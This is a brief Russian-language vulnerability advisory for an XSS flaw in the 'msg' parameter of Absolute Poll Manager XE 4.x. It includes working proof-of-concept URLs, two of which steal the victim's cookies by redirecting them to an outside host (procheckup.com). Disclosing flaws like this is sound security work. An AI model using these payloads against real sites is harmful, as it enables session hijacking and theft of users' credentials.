Программа: Absolute Poll Manager XE 4.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре "msg" сценарием xlaapmview.asp (когда "p" установлен в числовое значение). Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

Инжектирование Alert сообщения

http://target-domain.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert ("running+code+within+the+context+of+"%2bdocument.domain)</script>

Воровство Cookie

http://target-domain.com/AbsolutePollManager/xlaapmview.asp? p=1&msg=<script>location="http://procheckup.com/? "%2bdocument.cookie</script>

Частичная подделка данных

http://target-domain.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=%3cscript% 3elocation=%22http%3a//proch%65ckup%2ecom/?%22%2 bdocument.cookie%3c/script%3e&



Оставить мнение